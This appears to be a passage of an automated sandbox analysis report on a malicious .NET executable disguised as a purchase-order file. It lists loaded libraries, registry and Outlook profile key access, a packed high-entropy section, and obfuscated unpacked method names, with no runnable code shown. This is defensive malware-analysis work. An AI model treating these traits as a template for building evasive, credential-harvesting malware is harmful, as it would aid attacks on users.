Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: edputil.dll	Jump to behavior

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Windows.Forms.pdb source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1776294956.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbt source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1776294956.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_0702A610 push edi; iretd	0_2_0702A622
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_0702E18A push eax; retf	0_2_0702E1A9
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_0702F8E0 push edi; iretd	0_2_0702F8E6
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_0C469C70 pushad ; ret	0_2_0C469D09
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_0C46B122 pushad ; iretd	0_2_0C46B125
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_02739C30 push esp; retf 0275h	4_2_02739D55

Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Static PE information: section name: .text entropy: 7.706025892082417

Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, RKP540HM4yXe9jqp6d.cs	High entropy of concatenated method names: 'z7o4iZZWtN', 'pLH4BbHaK4', 'XfJ4DnDVJ2', 'L6Q4H0q5lB', 'ukK4lRV0iv', 'wW04P7w8C7', 'UGs4QwR9Ib', 'toC4yUMr5q', 'iho4n5aYBk', 'H2n4kjoj6w'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, U6kGI599D4WgGtrxspt.cs	High entropy of concatenated method names: 'NKmkqBaOBt', 'RobkzSowuR', 'kFlj6GJ984', 'mjDj9PIiMG', 'qs4jmW9EbT', 'gSqjRVxB30', 'TSajvBq8B9', 'o3WjKxF6k5', 'vaVj3s9JpO', 'TJ0j7n7eRY'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, oAxwWc4y0XBtNYpeMP.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'EaamghgLeQ', 'KsqmqRmXTZ', 'TPTmzhI5Oe', 'g7wR6ytKju', 'hErR9mTNki', 'P4yRmO1MpN', 'VbYRRfQKtB', 'kGirUdQWWAXISnhvm97'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, ky7MnMMS7iO41l4PF8.cs	High entropy of concatenated method names: 's2J03CReV8', 'mn9047ZsZ6', 'xnS0YEyhim', 'jTjYqOBJXW', 'B7OYziIlSl', 'HjU06KNVfb', 'vy809U44bQ', 'WoY0mnkcFC', 'IuD0RgjjCO', 'xjb0vE8oVm'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, NKmx3ySgEINLawaDA1.cs	High entropy of concatenated method names: 'I820OmWgL8', 'Brc0wna5XL', 'mkr0FE97Bg', 'UQl0i5TV0q', 'IR50I2UXhg', 'JuH0BxDyIC', 'h4q0CuPSAp', 'Y3Q0DWJP25', 'b8W0HnA7qL', 'p7T0JTotiV'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, GFItnUzkbCgQH6Refe.cs	High entropy of concatenated method names: 'bLMkBfxxxw', 'jF2kDDOo3X', 'ia5kHwEHh3', 'giSkrlFlkH', 'GW8kNuxINx', 'M6qkXQWxRS', 'LQakoNPJ8m', 'HHIkf8ADS3', 'BfBkOc2E9Q', 'Kxnkwx7jtl'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, yUtNMNgj1qq0s8mVWU.cs	High entropy of concatenated method names: 'q0mnr1UV5F', 'GnNnN6o7Of', 'icen19uTls', 'PGTnXyOWGJ', 'LYMnobkZ8q', 'fSMnpk3kXW', 'MdlnMJ1vwB', 'oEgndeneUQ', 'wRinSSPe4b', 'iu5nsja1Fh'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, TbqoPMmuwNbw5jUc2Q.cs	High entropy of concatenated method names: 'ebHFQoGrn', 'xgxiLI8H8', 'ngyBNeaDM', 'MKbC94bHC', 'HfXHZnIRo', 'wD0J3WoGF', 'nVNF9ArPgAiJC23jsN', 'nStYuO5gAWZlRIucRF', 'PYFJae61ZnGqmMTQCH', 'HdHyq5JsR'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, V5JjKuabZqAWXDtp5s.cs	High entropy of concatenated method names: 'mGpQhS0VO6', 'kASQqMw54D', 'aHhy6v0Rku', 'sIdy9eHd9Y', 'l7bQGvKMEs', 'bLfQZVUcIR', 'Gk7Q2DudPU', 'tGEQEFDlU3', 'NtrQVWnNjc', 'CK3QLRBqWN'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, Oeqh8dDwUiwosl8xFO.cs	High entropy of concatenated method names: 'BM57EHrEG0', 'Ls97VXKQI0', 'You7LIHgEi', 'qxI7WcqrPN', 'ReF78pg3Ju', 'VHg7av83BI', 'j0m7xVAMxT', 'kli7h1lkLE', 'LCA7gpdoOO', 'OAX7qPRL4k'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, C0rKsorgR2vF5UGEWL.cs	High entropy of concatenated method names: 'sJSYK1ye4c', 'eIxY726IPV', 'VW7YAjoKX0', 'kG0Y0o0HGc', 'RcoY5yna1V', 'U9tA8S0nCv', 'zNVAaYqjRW', 'PEpAxE8Ed5', 'aVqAhPabj3', 'GDlAgnhX7S'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, A6vJ9L9mUklshRUCAIC.cs	High entropy of concatenated method names: 'ToString', 'DNnjDxCI1e', 'zcGjHGmjBp', 'TSdjJIPpU1', 'r8fjrTJbtH', 'd30jNg4O8L', 'RZjj11JQC4', 'Y7fjXGWssO', 'fGlTUA7zCjxhUBQApTu', 'hO1bWayVZRZDPalCIvE'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, ealEPex077Y4TTePms.cs	High entropy of concatenated method names: 'BOwnlE48tU', 'hJsnQYkcVp', 'KRHnnEhfaT', 'OyLnjtupx0', 'GUxnekTcf5', 'VWsnfT9Ab0', 'Dispose', 'NJJy3N4ZgE', 'Mi3y7S4SEl', 'JwOy44dsLf'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, hHXEaRqvWA7edigZUi.cs	High entropy of concatenated method names: 'f39k4GgpGc', 'ftHkAoLmM1', 'YrnkYEriRl', 'QNGk0NmZ6t', 'kULknPHSi7', 'Fs8k5p5RiW', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, Jp5oXy9vrfHSaFguhmG.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UdJTntbpWc', 'vThTkR5irO', 'LblTjyRgBg', 'zOYTTaSDee', 'DaQTeSDPEa', 'd3uTtU1s7m', 'jFnTfA8lhD'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, UgQwYbW8dTiCUFoYYM.cs	High entropy of concatenated method names: 'lhiQc8oKXn', 'hrkQbGk5t4', 'ToString', 'zjlQ3Uvp5U', 'FPsQ7OO1BL', 'kkPQ4P07bV', 'PBMQANtgjD', 'pxsQY7JoqA', 'BYpQ0T5Wx5', 'SsHQ5Sxu2w'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, cYMcXZ7Au5o5ToCO08.cs	High entropy of concatenated method names: 'Dispose', 'gY49gTTePm', 'kd9mNJ5H2A', 'jU553Cp1N8', 'NB19qnvjTc', 'Vcj9zcm2Il', 'ProcessDialogKey', 'pAwm6UtNMN', 't1qm9q0s8m', 'RWUmm4HXEa'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, iVWwabv4xXnbA1dtSj.cs	High entropy of concatenated method names: 'q1G90eqh8d', 'yUi95wosl8', 'jM49cyXe9j', 'Yp69bdOGwS', 'PeA9l8qB0r', 'eso9PgR2vF', 'zARHyUQQ8jNu1NdIrO1', 'TOMwy1QERoXcHhJFMiH', 'VPZ99jocUq', 'HnF9RDJLKv'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, zSofow2BFxtS1KqH59.cs	High entropy of concatenated method names: 'CJSuDkR68d', 'urwuHK3qkA', 'aVjur6uHAR', 'yX1uNEdnRm', 'S2YuXJ0ouo', 'wypuo1SupG', 'gWfuMet7lP', 'JequdVXtda', 'j3gusp38SN', 'BknuGpeGG2'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, ePqRFg96smRT171bqGl.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kLUkGKR8CT', 'xqekZFLBrb', 'imjk2ZNLAs', 'j0ekE6y2Bg', 'CDekVV4Ndt', 'FkwkLCANsu', 'cRukWW9L6i'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, jQI0QRLWF0SUBPkkkX.cs	High entropy of concatenated method names: 'ToString', 'YOKPGsSXls', 'WRfPNqYLxN', 'rDQP1nq1TE', 'dJZPXh0lc5', 'rCrPoygs4j', 'HUbPpKJ0Jw', 'yMFPMU1s0C', 'I6cPdRMJwH', 'hfyPSgk8oI'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, xGwSjWJQNIkl5ZeA8q.cs	High entropy of concatenated method names: 'MrQAIqTiYj', 'aLMACE7nvo', 'WFu41cGgoW', 'LK54XWyBXq', 'KuZ4oK7wUs', 'qOR4ppVd5f', 'zmb4MZBTRp', 'RAW4dQgapH', 'kJq4SysRPK', 'KX54s51uwY'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, C5gGFg5FauOGa29wLc.cs	High entropy of concatenated method names: 'YEERKDdM2b', 'USTR3merTT', 'eRDR7REWFP', 'MAXR4QZ4os', 'bXjRA6qnmJ', 'vonRYwMM7A', 'MKfR0JWnki', 'BDFR5TYfbY', 'MYCRUJmlsb', 'DYqRcvcHZs'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, bHxwUyN3Tdr8G4PiTq.cs	High entropy of concatenated method names: 'thXCvlETiuhZADjwAkV', 'VCKqUUESuspU7xPTHeR', 'HKuPquE3OdDnWmLbHKx', 'G0wYyRDFkW', 'CgVYnuGvER', 'mBcYkAshXu', 'NJTKZgEXF8MRN0FdwyC', 'Vuk9afElVJfU2tshWGp'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, RKP540HM4yXe9jqp6d.cs	High entropy of concatenated method names: 'z7o4iZZWtN', 'pLH4BbHaK4', 'XfJ4DnDVJ2', 'L6Q4H0q5lB', 'ukK4lRV0iv', 'wW04P7w8C7', 'UGs4QwR9Ib', 'toC4yUMr5q', 'iho4n5aYBk', 'H2n4kjoj6w'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, U6kGI599D4WgGtrxspt.cs	High entropy of concatenated method names: 'NKmkqBaOBt', 'RobkzSowuR', 'kFlj6GJ984', 'mjDj9PIiMG', 'qs4jmW9EbT', 'gSqjRVxB30', 'TSajvBq8B9', 'o3WjKxF6k5', 'vaVj3s9JpO', 'TJ0j7n7eRY'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, oAxwWc4y0XBtNYpeMP.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'EaamghgLeQ', 'KsqmqRmXTZ', 'TPTmzhI5Oe', 'g7wR6ytKju', 'hErR9mTNki', 'P4yRmO1MpN', 'VbYRRfQKtB', 'kGirUdQWWAXISnhvm97'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, ky7MnMMS7iO41l4PF8.cs	High entropy of concatenated method names: 's2J03CReV8', 'mn9047ZsZ6', 'xnS0YEyhim', 'jTjYqOBJXW', 'B7OYziIlSl', 'HjU06KNVfb', 'vy809U44bQ', 'WoY0mnkcFC', 'IuD0RgjjCO', 'xjb0vE8oVm'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, NKmx3ySgEINLawaDA1.cs	High entropy of concatenated method names: 'I820OmWgL8', 'Brc0wna5XL', 'mkr0FE97Bg', 'UQl0i5TV0q', 'IR50I2UXhg', 'JuH0BxDyIC', 'h4q0CuPSAp', 'Y3Q0DWJP25', 'b8W0HnA7qL', 'p7T0JTotiV'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, GFItnUzkbCgQH6Refe.cs	High entropy of concatenated method names: 'bLMkBfxxxw', 'jF2kDDOo3X', 'ia5kHwEHh3', 'giSkrlFlkH', 'GW8kNuxINx', 'M6qkXQWxRS', 'LQakoNPJ8m', 'HHIkf8ADS3', 'BfBkOc2E9Q', 'Kxnkwx7jtl'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, yUtNMNgj1qq0s8mVWU.cs	High entropy of concatenated method names: 'q0mnr1UV5F', 'GnNnN6o7Of', 'icen19uTls', 'PGTnXyOWGJ', 'LYMnobkZ8q', 'fSMnpk3kXW', 'MdlnMJ1vwB', 'oEgndeneUQ', 'wRinSSPe4b', 'iu5nsja1Fh'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, TbqoPMmuwNbw5jUc2Q.cs	High entropy of concatenated method names: 'ebHFQoGrn', 'xgxiLI8H8', 'ngyBNeaDM', 'MKbC94bHC', 'HfXHZnIRo', 'wD0J3WoGF', 'nVNF9ArPgAiJC23jsN', 'nStYuO5gAWZlRIucRF', 'PYFJae61ZnGqmMTQCH', 'HdHyq5JsR'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, V5JjKuabZqAWXDtp5s.cs	High entropy of concatenated method names: 'mGpQhS0VO6', 'kASQqMw54D', 'aHhy6v0Rku', 'sIdy9eHd9Y', 'l7bQGvKMEs', 'bLfQZVUcIR', 'Gk7Q2DudPU', 'tGEQEFDlU3', 'NtrQVWnNjc', 'CK3QLRBqWN'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, Oeqh8dDwUiwosl8xFO.cs	High entropy of concatenated method names: 'BM57EHrEG0', 'Ls97VXKQI0', 'You7LIHgEi', 'qxI7WcqrPN', 'ReF78pg3Ju', 'VHg7av83BI', 'j0m7xVAMxT', 'kli7h1lkLE', 'LCA7gpdoOO', 'OAX7qPRL4k'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, C0rKsorgR2vF5UGEWL.cs	High entropy of concatenated method names: 'sJSYK1ye4c', 'eIxY726IPV', 'VW7YAjoKX0', 'kG0Y0o0HGc', 'RcoY5yna1V', 'U9tA8S0nCv', 'zNVAaYqjRW', 'PEpAxE8Ed5', 'aVqAhPabj3', 'GDlAgnhX7S'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, A6vJ9L9mUklshRUCAIC.cs	High entropy of concatenated method names: 'ToString', 'DNnjDxCI1e', 'zcGjHGmjBp', 'TSdjJIPpU1', 'r8fjrTJbtH', 'd30jNg4O8L', 'RZjj11JQC4', 'Y7fjXGWssO', 'fGlTUA7zCjxhUBQApTu', 'hO1bWayVZRZDPalCIvE'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, ealEPex077Y4TTePms.cs	High entropy of concatenated method names: 'BOwnlE48tU', 'hJsnQYkcVp', 'KRHnnEhfaT', 'OyLnjtupx0', 'GUxnekTcf5', 'VWsnfT9Ab0', 'Dispose', 'NJJy3N4ZgE', 'Mi3y7S4SEl', 'JwOy44dsLf'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, hHXEaRqvWA7edigZUi.cs	High entropy of concatenated method names: 'f39k4GgpGc', 'ftHkAoLmM1', 'YrnkYEriRl', 'QNGk0NmZ6t', 'kULknPHSi7', 'Fs8k5p5RiW', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, Jp5oXy9vrfHSaFguhmG.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UdJTntbpWc', 'vThTkR5irO', 'LblTjyRgBg', 'zOYTTaSDee', 'DaQTeSDPEa', 'd3uTtU1s7m', 'jFnTfA8lhD'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, UgQwYbW8dTiCUFoYYM.cs	High entropy of concatenated method names: 'lhiQc8oKXn', 'hrkQbGk5t4', 'ToString', 'zjlQ3Uvp5U', 'FPsQ7OO1BL', 'kkPQ4P07bV', 'PBMQANtgjD', 'pxsQY7JoqA', 'BYpQ0T5Wx5', 'SsHQ5Sxu2w'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, cYMcXZ7Au5o5ToCO08.cs	High entropy of concatenated method names: 'Dispose', 'gY49gTTePm', 'kd9mNJ5H2A', 'jU553Cp1N8', 'NB19qnvjTc', 'Vcj9zcm2Il', 'ProcessDialogKey', 'pAwm6UtNMN', 't1qm9q0s8m', 'RWUmm4HXEa'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, iVWwabv4xXnbA1dtSj.cs	High entropy of concatenated method names: 'q1G90eqh8d', 'yUi95wosl8', 'jM49cyXe9j', 'Yp69bdOGwS', 'PeA9l8qB0r', 'eso9PgR2vF', 'zARHyUQQ8jNu1NdIrO1', 'TOMwy1QERoXcHhJFMiH', 'VPZ99jocUq', 'HnF9RDJLKv'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, zSofow2BFxtS1KqH59.cs	High entropy of concatenated method names: 'CJSuDkR68d', 'urwuHK3qkA', 'aVjur6uHAR', 'yX1uNEdnRm', 'S2YuXJ0ouo', 'wypuo1SupG', 'gWfuMet7lP', 'JequdVXtda', 'j3gusp38SN', 'BknuGpeGG2'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, ePqRFg96smRT171bqGl.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kLUkGKR8CT', 'xqekZFLBrb', 'imjk2ZNLAs', 'j0ekE6y2Bg', 'CDekVV4Ndt', 'FkwkLCANsu', 'cRukWW9L6i'
